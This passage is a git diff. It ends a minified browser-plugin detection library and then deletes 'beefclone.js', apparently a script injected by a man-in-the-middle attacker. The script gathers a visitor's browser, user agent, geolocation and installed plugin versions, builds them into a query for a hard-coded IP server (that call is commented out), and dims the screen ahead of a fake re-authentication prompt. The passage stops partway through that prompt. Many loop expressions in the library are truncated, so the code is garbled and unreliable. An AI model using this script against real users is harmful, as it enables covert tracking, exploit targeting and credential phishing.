b=this,d=b.$,c=b.$$,a=c.navigator;return d.isIE?!a.javaEnabled():0},VerifyTagsDefault_1:function(){var a=this.$;if(a.OS>=20){return 1}if((a.isIE&&(a.verIE<9||!a.ActiveXEnabled))||(a.verGecko&&a.compareNums(a.verGecko,a.formatNum("2"))<0)||(a.isSafari&&(!a.verSafari||a.compareNums(a.verSafari,a.formatNum("4"))<0))||(a.verOpera&&a.verOpera<10)){return 0}return 1},z:0},can_Insert_Query:function(d){var b=this,c=b.results[0][0],a=b.getResult()[0];if(b.HTML[d]||(d==0&&c!==null&&!b.isRange(c))||(d==0&&a&&!b.isRange(a))){return 0}return !b.isDisabled.single(d)},can_Insert_Query_Any:function(){var b=this,a;for(a=0;a0||!c.isRange(a));if(!c.can_Insert_Query(e)||f[e]===0){return 0}if(f[e]==3||(f[e]==2.8&&!a)){return 1}if(!b.nonAppletDetectionOk(b.version0)){if(f[e]==2||(f[e]==1&&!a)){return 1}}return 0},should_Insert_Query_Any:function(){var b=this,a;for(a=0;a]/).test(a||"")?(a.charAt(0)==">"?1:-1):0},setRange:function(b,a){return(b?(b>0?">":"<"):"")+(this.$.isString(a)?a:"")},insertJavaTag:function(g,n,h,o,m){var e=this,c=e.$,k=e.$$,r="A.class",b=c.file.getValid(k),f=b.name+b.ext,q=b.path;var i=["archive",f,"code",r],l=(o?["width",o]:[]).concat(m?["height",m]:[]),j=["mayscript","true"],p=["scriptable","true","codebase_lookup","false"].concat(j),a=k.navigator,d=!c.isIE&&a.mimeObj&&a.mimeObj.type?a.mimeObj.type:k.mimeType[0];if(g==1){return c.isIE?c.DOM.insert("object",["type",d].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n):c.DOM.insert("object",["type",d].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n)}if(g==2){return c.isIE?c.DOM.insert("applet",["alt",h].concat(j).concat(i).concat(l),["codebase",q].concat(p),h,k,0,n):c.DOM.insert("applet",["codebase",q,"alt",h].concat(j).concat(i).concat(l),[].concat(p),h,k,0,n)}if(g==3){return c.isIE?c.DOM.insert("object",["classid",k.classID].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n):c.DOM.insert()}if(g==4){return c.DOM.insert("embed",["codebase",q].concat(i).concat(["type",d]).concat(p).concat(l),[],h,k,0,n)}},insert_Query_Any:function(i){var b=this,d=b.$,c=b.$$,g=b.results,j=b.HTML,a=d.DOM.altHTML,e,h=d.file.getValid(c);if(b.should_Insert_Query(0)){if(c.OTF<2){c.OTF=2};g[0]=[0,0];e=i?b.codebase.isMin(i):b.codebase.search();if(e){g[0][0]=i?b.setRange(e,i):e}b.active[0]=e?1.5:-1}if(!h){return b.getResult()}if(!b.DummySpanTagHTML){b.DummySpanTagHTML=d.DOM.insert("",[],[],a)}if(b.should_Insert_Query(1)){if(c.OTF<2){c.OTF=2};j[1]=b.insertJavaTag(1,0,a);g[1]=[0,0];b.query(1)}if(b.should_Insert_Query(2)){if(c.OTF<2){c.OTF=2};j[2]=b.insertJavaTag(2,0,a);g[2]=[0,0];b.query(2)}if(b.should_Insert_Query(3)){if(c.OTF<2){c.OTF=2};j[3]=b.insertJavaTag(3,0,a);g[3]=[0,0];b.query(3)}if(d.DOM.isEnabled.objectTag()){if(!b.DummyObjTagHTML&&(j[1]||j[2])){b.DummyObjTagHTML=d.DOM.insert("object",["type",c.mimeType_dummy],[],a)}if(!b.DummyObjTagHTML2&&j[3]){b.DummyObjTagHTML2=d.DOM.insert("object",["classid",c.classID_dummy],[],a)}}var f=c.NOTF;if(c.OTF<3&&f.shouldContinueQuery()){c.OTF=3;f.onIntervalQuery=d.ev.handler(f.$$onIntervalQuery,f);if(!d.win.loaded){d.win.funcs0.push([f.winOnLoadQuery,f])}setTimeout(f.onIntervalQuery,f.intervalLength)}return b.getResult()}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function(){var f=this,e=f.$,c=f.$$,b=c.applet,a,d=0;if(e.win.loaded&&f.count>f.countMax){return 0}for(a=0;af.countMax&&e.codebase.checkGarbage(b.HTML[a].span)){d=1;b.HTML[a].DELETE=1}if(!d&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&f.isAppletActive(a)>=0){return 1}}};return 0},isJavaActive:function(d){var f=this,c=f.$$,a,b,e=-9;for(a=0;ae){e=b}}return e},isAppletActive:function(e,g){var h=this,f=h.$,b=h.$$,l=b.navigator,a=b.applet,i=a.HTML[e],d=a.active,k,c=0,j,m=d[e];if(g||m>=1.5||!i||!i.span){return m};j=f.DOM.getTagStatus(i,a.DummySpanTagHTML,a.DummyObjTagHTML,a.DummyObjTagHTML2,h.count);for(k=0;k0){c=1}}if(j!=1){m=j}else{if(f.isIE||(b.version0&&l.javaEnabled()&&l.mimeObj&&(i.tagName=="object"||c))){m=1}else{m=0}}d[e]=m;return m},winOnLoadQuery:function(c,d){var b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();d.queryCompleted(a)}},$$onIntervalQuery:function(d){var c=d.$,b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();if(!d.shouldContinueQuery()){d.queryCompleted(a)}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},queryAllApplets:function(){var f=this,e=f.$,d=f.$$,c=d.applet,b,a;for(b=0;b=4){return}e.OTF=4;var a=g.isJavaActive();for(b=0;b2;h--){c=g.getAXO(j.progID+"."+h);if(c){a=h.toString();break}}if(!c){c=g.getAXO(j.progID)}if(a=="6"){try{c.AllowScriptAccess="always"}catch(k){return"6,0,21,0"}}try{l=b(c.GetVariable("$version"))}catch(k){}if(!l&&a){l=a}}j.installed=l?1:-1;j.version=g.formatNum(l);return true}},shockwave:{$:1,mimeType:"application/x-director",progID:"SWCtl.SWCtl",classID:"clsid:166B1BCA-3F9C-11CF-8075-444553540000",getVersion:function(){var a=null,b=null,g,f,d=this,c=d.$;if(!c.isIE){f=c.findNavPlugin("Shockwave\\s*for\\s*Director");if(f&&f.description&&c.hasMimeType(d.mimeType)){a=c.getNum(f.description)}if(a){a=c.getPluginFileVersion(f,a)}}else{try{b=c.getAXO(d.progID).ShockwaveVersion("")}catch(g){}if(c.isString(b)&&b.length>0){a=c.getNum(b)}else{if(c.getAXO(d.progID+".8")){a="8"}else{if(c.getAXO(d.progID+".7")){a="7"}else{if(c.getAXO(d.progID+".1")){a="6"}}}}}d.installed=a?1:-1;d.version=c.formatNum(a)}},windowsmediaplayer:{$:1,mimeType:["application/x-mplayer2","application/asx","application/x-ms-wmp"],navPluginObj:null,progID:"WMPlayer.OCX",classID:"clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6",INSTALLED:{dfault:null,inputMime:{}},getVersion:function(i,g){var c=this,f=c.$,l,e=null,h=null,j=c.mimeType,k="Totem|VLC",b,d,a;c.installed=-1;if(f.isString(g)){g=g.replace(/\s/g,"");if(g){j=g}}else{g=null}if(g){d=c.INSTALLED.inputMime[g];if(f.isDefined(d)){c.installed=d;return}}else{d=c.INSTALLED.dfault;if(d!==null){c.installed=d;return}}if(!f.isIE){if(f.OS<20&&f.OS>=3){c.installed=-1;return}a={wmp:"Windows\\s*Media\\s*Player.*Plug-?in|Flip4Mac.*Windows\\s*Media.*Plug-?in",wmpFirefox:"Windows\\s*Media\\s*Player.*Firefox.*Plug-?in",avoidPlayers:"Totem|VLC|RealPlayer"};if(c.getVersionDone===null){c.getVersionDone=0;e=f.getMimeEnabledPlugin(c.mimeType,a.wmp,a.avoidPlayers);if(!g){l=e}if(!e&&f.hasMimeType(c.mimeType)){e=f.findNavPlugin(a.wmp,0,a.avoidPlayers)}if(e){c.navPluginObj=e;b=(f.isGecko&&f.compareNums(f.verGecko,f.formatNum("1.8"))<0);b=b||(f.isOpera&&f.verOpera<10);b=b||f.isChrome;if(f.DOM.isEnabled.objectTag()&&!b&&f.getMimeEnabledPlugin(c.mimeType[2],a.wmpFirefox,a.avoidPlayers)){h=f.getPROP(f.DOM.insert("object",["type",c.mimeType[2],"data",""],["src",""],"",c).obj(),"versionInfo")||h}}}else{h=c.version}if(!f.isDefined(l)){l=f.getMimeEnabledPlugin(j,a.wmp,a.avoidPlayers)}c.installed=l&&h?1:(l?0:(c.navPluginObj?-0.2:-1))}else{e=f.getAXO(c.progID);h=f.getPROP(e,"versionInfo")||h;c.installed=e&&h?1:(e?0:-1)}if(!c.version){c.version=f.formatNum(h)}if(g){c.INSTALLED.inputMime[g]=c.installed}else{c.INSTALLED.dfault=c.installed}}},silverlight:{$:1,mimeType:"application/x-silverlight",progID:"AgControl.AgControl",digits:[20,20,9,12,31],getVersion:function(){var e=this,c=e.$,k=document,i=null,b=null,f=null,h=true,a=[1,0,1,1,1],r=[1,0,1,1,1],j=function(d){return(d<10?"0":"")+d.toString()},n=function(s,d,u,v,t){return(s+"."+d+"."+u+j(v)+j(t)+".0")},o=function(s,d,t){return q(s,(d==0?t:r[0]),(d==1?t:r[1]),(d==2?t:r[2]),(d==3?t:r[3]),(d==4?t:r[4]))},q=function(v,t,s,x,w,u){var u;try{return v.IsVersionSupported(n(t,s,x,w,u))}catch(u){}return false};if(!c.isIE){var g;if(c.hasMimeType(e.mimeType)){g=c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0;if(c.isGecko&&g){h=false}f=c.findNavPlugin("Silverlight.*Plug-?in",0);if(f&&f.description){i=c.formatNum(f.description)}if(i){r=i.split(c.splitNumRegx);if(parseInt(r[2],10)>=30226&&parseInt(r[0],10)<2){r[0]="2"}i=r.join(",")}}e.installed=f&&h&&i?1:(f&&h?0:(f?-0.2:-1))}else{b=c.getAXO(e.progID);var m,l,p;if(b&&q(b,a[0],a[1],a[2],a[3],a[4])){for(m=0;m',DIGITMAX:[[11,11,16]],DIGITMIN:[0,0,0,0],Upper:["999"],Lower:["0"],convert:[1]},compareNums:function(e,d){var c=this.$,k=e.split(c.splitNumRegx),i=d.split(c.splitNumRegx),h,b,a,g,f,j;for(h=0;h0)?RegExp.$2.charCodeAt(0):-1;j=/([\d]+)([a-z]?)/.test(i[h]);a=parseInt(RegExp.$1,10);f=(h==2&&RegExp.$2.length>0)?RegExp.$2.charCodeAt(0):-1;if(b!=a){return(b>a?1:-1)}if(h==2&&g!=f){return(g>f?1:-1)}}return 0},setPluginStatus:function(e,a,f){var d=this,c=d.$,b=d.installed;d.installed=a?1:(f?(f>0?0.7:-0.1):(e?0:-1));if(a){d.version=c.formatNum(a)}d.getVersionDone=d.installed==0.7||d.installed==-0.1?0:1;c.codebase.emptyGarbage()},getVersion:function(c){var e=this,d=e.$,f=null,a=null,b;if(!d.isIE){if(d.hasMimeType(e.mimeType)){f=d.findNavPlugin("VLC.*Plug-?in",0,"Totem");if(f&&f.description){a=d.getNum(f.description,"[\\d][\\d\\.]*[a-z]*")}}}else{f=d.getAXO(e.progID);if(f){a=d.getNum(d.getPROP(f,"VersionInfo"),"[\\d][\\d\\.]*[a-z]*")};if(!a||d.dbug){b=e.codebase.isMin(c);if(b){e.setPluginStatus(0,0,b);return}}if(!a||d.dbug){a=e.codebase.search()}}e.setPluginStatus(f,a,0)}},adobereader:{$:1,setPluginStatus:function(){var d=this,b=d.$,a=d.navPlugin.detected,e=d.navPlugin.version,g=d.axo.detected,c=d.axo.version,i=d.doc.detected,h=d.doc.version,f=e||c||h||null;d.installed=f?1:(a>0||g>0||i>0?0:(i==-0.5?-0.15:(b.isIE&&(!b.ActiveXEnabled||b.ActiveXFilteringEnabled)?-1.5:-1)));d.version=b.formatNum(f)},getVersion:function(c,e){var a=this,d=a.$,b=0;if((!b||d.dbug)&&a.navPlugin.query().detected>0){b=1}if((!b||d.dbug)&&a.axo.query().detected>0){b=1}if((!b||d.dbug)&&(a.doc.query().detected>0||a.doc.detected==-0.5)){b=1}a.setPluginStatus()},navPlugin:{$:1,detected:0,version:null,mimeType:"application/pdf",isDisabled:function(){var c=this,b=c.$,a=c.$$;return b.isIE||c.detected||!b.hasMimeType(c.mimeType)?1:0},attempt3:function(){var c=this,b=c.$,a=null;if(b.OS==1){if(b.hasMimeType("application/vnd.adobe.pdfxml")){a="9"}else{if(b.hasMimeType("application/vnd.adobe.x-mars")){a="8"}else{if(b.hasMimeType("application/vnd.adobe.xfdf")){a="6"}}}}return a},query:function(){var d=this,c=d.$,a=d.$$,f,e,b=null;if(d.isDisabled()){return d};f="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";e=c.findNavPlugin(f,0);d.detected=e?1:-1;if(e){b=c.getNum(e.description)||c.getNum(e.name);b=c.getPluginFileVersion(e,b);if(!b){b=d.attempt3()}}if(b){d.version=b};return d}},pluginQuery:function(j){var f=this,d=f.$,b="",h=null,g,a,i,c;try{if(j){b=j.GetVersions()}}catch(g){}if(b&&d.isString(b)){a=/=\s*([\d\.]+)/g;for(i=0;i<30;i++){if(a.test(b)){c=d.formatNum(RegExp.$1);if(!h||d.compareNums(c>h)>0){h=c}}else{break}}}return h},axo:{$:1,detected:0,version:null,progID:["AcroPDF.PDF","AcroPDF.PDF.1","PDF.PdfCtrl","PDF.PdfCtrl.5","PDF.PdfCtrl.1"],isDisabled:function(){var b=this,c=b.$,a=b.$$;return c.isIE&&!b.detected?0:1},query:function(){var d=this,e=d.$,b=d.$$,f=0,c=null,a;if(d.isDisabled()){return d};for(a=0;a0||h?1:(b==-0.1||b==-0.5?-0.5:-1);i.version=h?h:null;return i}}},pdfreader:{$:1,OTF:null,detectIE3P:0,setPluginStatus:function(){var a=this,e=a.$,f=a.doc.result,d=a.mime.result,c=a.axo.result,b=a.OTF;a.version=null;if(b==3){a.installed=-0.5}else{a.installed=f>0||d>0||c>0?0:(f==-0.5?-0.15:(e.isIE&&(!e.ActiveXEnabled||e.ActiveXFilteringEnabled||!a.detectIE3P)?-1.5:-1))}if(a.verify&&a.verify.isEnabled()){a.getVersionDone=0}else{if(a.getVersionDone!=1){a.getVersionDone=!a.doc.isDisabled()&&a.installed<=-1?0:1}}},getVersion:function(k,d,m){var f=this,b=f.$,h=false,c,a,i,g=f.NOTF,l=f.doc,j=f.verify;if(b.isDefined(m)){f.detectIE3P=m?1:0}if(f.getVersionDone===null){f.OTF=0;if(j){j.begin()}}b.file.save(f,".pdf",d);if(f.getVersionDone===0){if(j&&j.isEnabled()&&b.isNum(f.installed)&&f.installed>=0){return}if(l.insertHTMLQuery()>0){h=true}f.setPluginStatus();return}if((!h||b.dbug)&&f.mime.query()>0){h=true}if((!h||b.dbug)&&f.axo.query()>0){h=true}if((!h||b.dbug)&&l.insertHTMLQuery()>0){h=true}f.setPluginStatus()},mime:{$:1,mimeType:"application/pdf",result:0,isDisabled:function(){var a=this.$;return a.isIE?1:0},query:function(){var c=this,b=c.$,a=c.$$;if(!c.isDisabled()&&!c.result){c.result=b.hasMimeType(c.mimeType)?1:-1}return c.result}},axo:{$:1,result:0,progID:["AcroPDF.PDF","AcroPDF.PDF.1","PDF.PdfCtrl","PDF.PdfCtrl.5","PDF.PdfCtrl.1"],prodID3rd:["NitroPDF.IE.ActiveDoc","PDFXCviewIEPlugin.CoPDFXCviewIEPlugin","PDFXCviewIEPlugin.CoPDFXCviewIEPlugin.1","FoxitReader.FoxitReaderCtl","FoxitReader.FoxitReaderCtl.1","FOXITREADEROCX.FoxitReaderOCXCtrl","FOXITREADEROCX.FoxitReaderOCXCtrl.1"],isDisabled:function(){var a=this.$;return a.isIE?0:1},query:function(){var c=this,d=c.$,b=c.$$,a;if(!c.isDisabled()&&!c.result){c.result=-1;for(a=0;a=2){b=1}else{if(c.dbug){}else{if(!c.DOM.isEnabled.objectTag()||(c.isGecko&&c.compareNums(c.verGecko,"2,0,0,0")<=0&&c.OS<=4)||(c.isOpera&&c.verOpera<=11&&c.OS<=4)||(c.isChrome&&c.compareNums(c.verChrome,"10,0,0,0")<0&&c.OS<=4)){b=1}}}return b},queryObject:function(c){var f=this,e=f.$,b=f.$$,a=0,d=1;a=e.DOM.getTagStatus(f.HTML,f.DummySpanTagHTML,f.DummyObjTagHTML1,0,c,d);f.result=a;return a},insertHTMLQuery:function(){var g=this,f=g.$,a=g.$$,b=a.pdf,d=f.file.getValid(a),e=1,c=f.DOM.altHTML;if(!d||!d.full||g.isDisabled()){return g.result}if(a.OTF<2){a.OTF=2};d=d.full;if(!g.DummySpanTagHTML){g.DummySpanTagHTML=f.DOM.insert("",[],[],c,a,e)}if(!g.HTML){g.HTML=f.DOM.insert("object",(f.isIE&&!a.detectIE3P?["classid",g.classID]:["type",g.mimeType]).concat(["data",d]),["src",d],c,a,e)}if(!g.DummyObjTagHTML1){g.DummyObjTagHTML1=f.DOM.insert("object",(f.isIE&&!a.detectIE3P?["classid",g.classID_dummy]:["type",g.mimeType_dummy]),[],c,a,e)}g.queryObject();if(f.isIE&&g.result===0){g.HTML.span.innerHTML=g.HTML.outerHTML;g.DummyObjTagHTML1.span.innerHTML=g.DummyObjTagHTML1.outerHTML;g.queryObject()}if((g.result>0||g.result<-0.1)&&!f.dbug){return g.result}var h=a.NOTF;if(a.OTF<3&&g.HTML&&h){a.OTF=3;h.onIntervalQuery=f.ev.handler(h.$$onIntervalQuery,h);if(!f.win.loaded){f.win.funcs0.push([h.winOnLoadQuery,h])}setTimeout(h.onIntervalQuery,h.intervalLength)}return g.result}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,$$onIntervalQuery:function(d){var b=d.$,a=d.$$,c=a.doc;if(a.OTF==3){c.queryObject(d.count);if(c.result||(b.win.loaded&&d.count>d.countMax)){d.queryCompleted()}}d.count++;if(a.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},winOnLoadQuery:function(b,d){var a=d.$$,c=a.doc;if(a.OTF==3){c.queryObject(d.count);d.queryCompleted()}},queryCompleted:function(){var d=this,b=d.$,a=d.$$,c=a.doc;if(a.OTF==4){return}a.OTF=4;a.setPluginStatus();if(b.onDetectionDone&&a.funcs){b.ev.callArray(a.funcs)}if(b.DOM){b.DOM.onDoneEmptyDiv()}}},getInfo:function(){var b=this,c=b.$,a={OTF:(b.OTF<3?0:(b.OTF==3?1:2)),DummyPDFused:(b.doc.result>0?true:false)};return a},zz:0},realplayer:{$:1,mimeType:["audio/x-pn-realaudio-plugin"],progID:["rmocx.RealPlayer G2 Control","rmocx.RealPlayer G2 Control.1","RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)","RealVideo.RealVideo(tm) ActiveX Control (32-bit)","RealPlayer"],classID:"clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA",INSTALLED:{},q1:[[11,0,0],[999],[663],[663],[663],[660],[468],[468],[468],[468],[468],[468],[431],[431],[431],[372],[180],[180],[172],[172],[167],[114],[0]],q3:[[6,0],[12,99],[12,69],[12,69],[12,69],[12,69],[12,69],[12,69],[12,69],[12,69],[12,69],[12,69],[12,46],[12,46],[12,46],[11,3006],[11,2806],[11,2806],[11,2804],[11,2804],[11,2799],[11,2749],[11,2700]],compare:function(g,f){var e,d=g.length,i=f.length,c,h;for(e=0;eh){return 1}if(cf[0].length?d.slice(f[0].length):[];if(g.compare(b,f[1])>0||g.compare(b,f[f.length-1])<0){return i}for(h=f.length-1;h>=1;h--){if(h==1){break}if(g.compare(f[h],b)==0&&g.compare(f[h],f[h-1])==0){break}if(g.compare(b,f[h])>=0&&g.compare(b,f[h-1])<0){break}}return e[0].join(".")+"."+e[h].join(".")},getVersion:function(m,n){var j=this,k=null,c=0,g=0,d=j.$,q,i,s,a=j.mimeType[0];if(d.isString(n)){n=n.replace(/\s/g,"");if(n){a=n}}else{n=null}if(d.isDefined(j.INSTALLED[a])){j.installed=j.INSTALLED[a];return}if(!d.isIE){var l="RealPlayer.*Plug-?in",h=d.hasMimeType(j.mimeType),o=d.findNavPlugin(l,0);if(h&&o){c=1;if(n){if(d.getMimeEnabledPlugin(n,l)){g=1}else{g=0}}else{g=1}}if(j.getVersionDone!==0){j.getVersionDone=0;if(h){var p=1,b=null,r=null;s=d.hasMimeType("application/vnd.rn-realplayer-javascript");if(s){b=d.formatNum(d.getNum(s.enabledPlugin.description))};if(d.OS==1&&b){var f=b.split(d.splitNumRegx);r=true;if(j.compare(f,[6,0,12,200])<0){r=false}else{if(j.compare(f,[6,0,12,1739])<=0&&j.compare(f,[6,0,12,857])>=0){r=false}}}if(r===false){p=0}if(d.OS<=2){if(d.isGecko&&d.compareNums(d.verGecko,d.formatNum("1,8"))<0){p=0}if(d.isChrome){p=0}if(d.isOpera&&d.verOpera<10){p=0}}else{p=0}if(!k&&p&&d.DOM.isEnabled.objectTag()){s=d.DOM.insert("object",["type",j.mimeType[0]],["src","","autostart","false","imagestatus","false","controls","stopbutton"],"",j).obj();try{k=d.getNum(s.GetVersionInfo())}catch(q){}d.DOM.setStyle(s,["display","none"])}if(!k&&b&&r===false){s=j.convertNum(b,j.q3,j.q1);k=s?s:b}}}else{k=j.version}j.installed=c&&g&&k?1:(c&&g?0:(c?-0.2:-1))}else{s=null;for(i=0;i',DIGITMAX:[[100,100,100,0]],DIGITMIN:[0,0,0,0],Upper:["99999"],Lower:["0"],convert:[1]},clone:function(c,a){var h=this,d=h.$,g,e,i,f=0,b=20;if(d.isNum(c)||d.isString(c)||c===null||d.isFunc(c)||c===d||c===d.Plugins||c===h){return c}else{if(c.window||c.firstChild||c.appendChild){return c}else{if(d.isArray(c)){i=[]}else{if(c){i={}}}}}for(g in c){f++;i[g]=h.clone(c[g],g)}return i},setPluginStatus:function(e,a,b){var d=this,c=d.$;d.version=c.formatNum(a);d.installed=a?1:(e?(e>0?0.7:-0.1):(b?-3:-1))},getVersion:function(f,g,j){var k=this,e=k.$,b=null,h=null,i,d,c,a="";k.getVersionDone=0;if(g&&e.isString(g)&&(/[^\s]+/).test(g)){g=g.replace(/\s/g,"");a=g.replace(/[\:\-\/]/g,"$")}else{k.setPluginStatus(0,0,1);return}if(e.isArray(j)){if(!j.length){j.push(0)}for(i=0;i99999999){k.setPluginStatus(0,0,1);return}}if(a&&k.storage[a]){d=k.storage[a].codebase;c=0;for(i=0;i(i0?0:-1}if(b.verify&&b.verify.isEnabled()){b.getVersionDone=0}else{if(b.getVersionDone!=1){b.getVersionDone=!b.doc.isDisabled()&&b.installed<=-1?0:1}}},getVersion:function(c,b){var d=this,e=d.$,a=false,g=d.verify,h=d.NOTF,f=d.doc;if(d.getVersionDone===null){d.OTF=0;if(g){g.begin()}}e.file.save(d,".pdf",b);if(d.getVersionDone===0){if(g&&g.isEnabled()&&e.isNum(d.installed)&&d.installed>=0){return}}if((!a||e.dbug)&&f.insertHTMLQuery()>0){a=true}d.setPluginStatus()},doc:{$:1,result:0,mimeType:"application/pdf",mimeType_dummy:"application/dummymimepdf",DummySpanTagHTML:0,HTML:0,DummyObjTagHTML1:0,isDisabled:function(){var d=this,c=d.$,b=d.$$,a=0;if(b.OTF>=2){a=1}else{if(c.dbug){}else{if(!c.DOM.isEnabled.objectTag()||!c.isGecko){a=1}}}return a},queryObject:function(b){var j=this,g=j.$,h=j.$$,i,f=j.HTML?j.HTML.obj():0,d=0,c=0,a=g.dbug&&!g.win.loaded?0:1;try{if(f&&f.contentDocument){d=1}}catch(i){}if(d&&a){j.result=1};if(!d||g.dbug){c=g.DOM.getTagStatus(j.HTML,j.DummySpanTagHTML,j.DummyObjTagHTML1,0,b);if(c<0&&a){j.result=-1}};return j.result},insertHTMLQuery:function(){var g=this,f=g.$,d=g.$$,a=d.pdf,c=f.file.getValid(d),e=1,b=f.DOM.altHTML;if(!c||!c.full||g.isDisabled()){return g.result}if(d.OTF<2){d.OTF=2}c=c.full;if(!g.DummySpanTagHTML){g.DummySpanTagHTML=f.DOM.insert("",[],[],b,d,e)}if(!g.HTML){g.HTML=f.DOM.insert("object",["type",g.mimeType,"data",c],["src",c],b,d,e)}if(!g.DummyObjTagHTML1){g.DummyObjTagHTML1=f.DOM.insert("object",["type",g.mimeType_dummy],[],b,d,e)}g.queryObject();if((g.result>0||g.result<0)&&!f.dbug){return g.result}var h=d.NOTF;if(d.OTF<3&&g.HTML&&h){d.OTF=3;h.onIntervalQuery=f.ev.handler(h.$$onIntervalQuery,h);if(!f.win.loaded){f.win.funcs0.push([h.winOnLoadQuery,h])}setTimeout(h.onIntervalQuery,h.intervalLength)}return g.result}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,$$onIntervalQuery:function(d){var b=d.$,a=d.$$,c=a.doc;if(a.OTF==3){c.queryObject(d.count);if(c.result||(b.win.loaded&&d.count>d.countMax)){d.queryCompleted()}}d.count++;if(a.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},winOnLoadQuery:function(b,d){var a=d.$$,c=a.doc;if(a.OTF==3){c.queryObject(d.count);d.queryCompleted()}},queryCompleted:function(){var d=this,b=d.$,a=d.$$,c=a.doc;if(a.OTF==4){return}a.OTF=4;a.setPluginStatus();if(b.onDetectionDone&&a.funcs){b.ev.callArray(a.funcs)}if(b.DOM){b.DOM.onDoneEmptyDiv()}}},zz:0},zz:0}};PluginDetect.INIT(); \ No newline at end of file diff --git a/mitm/beefclone.js b/mitm/beefclone.js deleted file mode 100755 index e9ccfbb..0000000 --- a/mitm/beefclone.js +++ /dev/null @@ -1,237 +0,0 @@ - var geolocation = ""; - var browserVer = ""; - var userAgent = ""; - - function browserVersion(){ - var browser = ''; - var browserVersion = 0; - if (/Opera[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { - browser = 'Opera'; - } else if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)) { - browser = 'MSIE'; - } else if (/Navigator[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { - browser = 'Netscape'; - } else if (/Chrome[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { - browser = 'Chrome'; - } else if (/Safari[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { - browser = 'Safari'; - /Version[\/\s](\d+\.\d+)/.test(navigator.userAgent); - browserVersion = new Number(RegExp.$1); - } else if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { - browser = 'Firefox'; - } - if(browserVersion === 0){ - browserVersion = parseFloat(new Number(RegExp.$1)); - } - browserVer ="browser="+browser+"&browserVersion="+browserVersion; - userAgent = "&userAgent="+navigator.userAgent; - } - - function showLocation(position) { - var latitude = position.coords.latitude; - var longitude = position.coords.longitude; - geolocation = "&latitude="+latitude+"&longitude="+longitude; - //alert("Latitude : " + latitude + " Longitude: " + longitude); - getVersion(); - } - - function getVersion(){ - browserVersion(); - - //var tz = jstz.determine(); - //var timezone = "&timezone="+tz.name(); - - //var visits = visits; - var referer = document.referrer; - var qtversion = PluginDetect.getVersion("quicktime"); - var axversion = PluginDetect.getVersion("activex"); - var flashversion = PluginDetect.getVersion("flash"); - var ieversion = PluginDetect.getVersion("iecomponent"); - var javaversion = PluginDetect.getVersion("java"); - var pdfjsversion = PluginDetect.getVersion("pdfjs"); - var pdfreaderversion = PluginDetect.getVersion("pdfreader"); - var realplayerversion = PluginDetect.getVersion("realplayer"); - var shockwaveversion = PluginDetect.getVersion("shockwave"); - var silverlightversion = PluginDetect.getVersion("silverlight"); - var vlcversion = PluginDetect.getVersion("vlc"); - var windowsmpversion = PluginDetect.getVersion("windowsmediaplayer"); - - var output = ""; - output += browserVer; - output += userAgent; - output += "&visits="+visits; - output += "&qtversion="+qtversion; - output += "&axversion="+axversion; - output += "&flashversion="+ flashversion; - output += "&ieversion="+ ieversion; - output += "&javaversion="+ javaversion; - output += "&pdfjsversion="+ pdfjsversion; - output += "&pdfreaderversion="+ pdfreaderversion; - output += "&realplayerversion="+ realplayerversion; - output += "&shockwaveversion="+ shockwaveversion; - output += "&silverlightversion="+ silverlightversion; - output += "&vlcversion="+ vlcversion; - output += "&windowsmpversion="+ windowsmpversion; - return output; - - // $.ajax({ - // type: "GET", - // url: "http://96.126.106.188:8888/bin/process", - // data: output, - // success: function() { - // } - // }); - - } - - function errorHandler(err) { - if(err.code == 1) { - //alert("Error: Access is denied!"); - }else if( err.code == 2) { - //alert("Error: Position is unavailable!"); - } - } - function getLocation(){ - if(navigator.geolocation){ - // timeout at 60000 milliseconds (60 seconds) - var options = {timeout:60000}; - navigator.geolocation.getCurrentPosition(showLocation, - errorHandler, - options); - - }else{ - alert("Sorry, browser does not support geolocation!"); - } - } - - var answer= ''; - function grayOut(vis, options) { - var options = options || {}; - var zindex = options.zindex || 50; - var opacity = options.opacity || 70; - var opaque = (opacity / 100); - var bgcolor = options.bgcolor || '#000000'; - var dark=document.getElementById('darkenScreenObject'); - if (!dark) { - var tbody = document.getElementsByTagName("body")[0]; - var tnode = document.createElement('div'); // Create the layer. - tnode.style.position='absolute'; // Position absolutely - tnode.style.top='0px'; // In the top - tnode.style.left='0px'; // Left corner of the page - tnode.style.overflow='hidden'; // Try to avoid making scroll bars - tnode.style.display='none'; // Start out Hidden - tnode.id='darkenScreenObject'; // Name it so we can find it later - tbody.appendChild(tnode); // Add it to the web page - dark=document.getElementById('darkenScreenObject'); // Get the object. - } - if (vis) { - var pageWidth='100%'; - var pageHeight='100%'; - dark.style.opacity=opaque; - dark.style.MozOpacity=opaque; - dark.style.filter='alpha(opacity='+opacity+')'; - dark.style.zIndex=zindex; - dark.style.backgroundColor=bgcolor; - dark.style.width= pageWidth; - dark.style.height= pageHeight; - dark.style.display='block'; - } else { - dark.style.display='none'; - } - } - - // CURRENTLY NOT USED - // Send done prompt to user - function win(){ - document.getElementById('popup').innerHtml='

Thank you for re-authenticating, you will now be returned to the application

